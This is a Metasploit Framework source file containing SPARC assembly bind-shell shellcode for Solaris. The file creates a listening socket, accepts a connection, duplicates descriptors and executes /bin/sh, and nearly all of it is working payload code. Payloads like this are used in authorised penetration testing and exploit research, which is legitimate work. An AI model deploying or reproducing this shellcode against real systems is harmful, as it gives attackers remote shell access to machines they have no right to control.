metasploit-framework/external/source/unixasm/sol-sparc-bndsockcode.s

97 lines
2.0 KiB
ArmAsm
Raw Normal View History

/*
* sol-sparc-bndsockcode.s
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
.globl _start
_start:
# 00 bytes
bndsockcode:
# so_socket
mov 0x02,%o4
xor %o3,%o3,%o3
xor %o2,%o2,%o2
mov 0x02,%o1
mov 0x02,%o0
mov 0xe6,%g1
ta 0x08
st %o0,[%sp-0x08]
# bind
set 0x204d2fff,%l0
srl %l0,12,%l0
mov 0x02,%o3
mov 0x10,%o2
st %l0,[%sp-0x10]
st %g0,[%sp-0x0c]
sub %sp,0x10,%o1
mov 0xe8,%g1
ta 0x08
# listen
mov 0x05,%o1
ld [%sp-0x08],%o0
mov 0xe9,%g1
ta 0x08
# accept
xor %o2,%o2,%o2
xor %o1,%o1,%o1
ld [%sp-0x08],%o0
mov 0xea,%g1
ta 0x08
st %o0,[%sp-0x04]
# fcntl
mov 0x03,%o2
0:
subcc %o2,1,%o2
mov 0x09,%o1
mov 0x3e,%g1
ta 0x08
bnz,a 0b
ld [%sp-0x04],%o0
shellcode:
xor %o2,%o2,%o2
sethi %hi(0x2f62696e),%l0
or %l0,0x96e,%l0
sethi %hi(0x2f736800),%l1
std %l0,[%sp-0x08]
sub %sp,0x08,%o0
st %o0,[%sp-0x10]
st %g0,[%sp-0x0c]
sub %sp,0x10,%o1
mov 0x3b,%g1
ta 0x08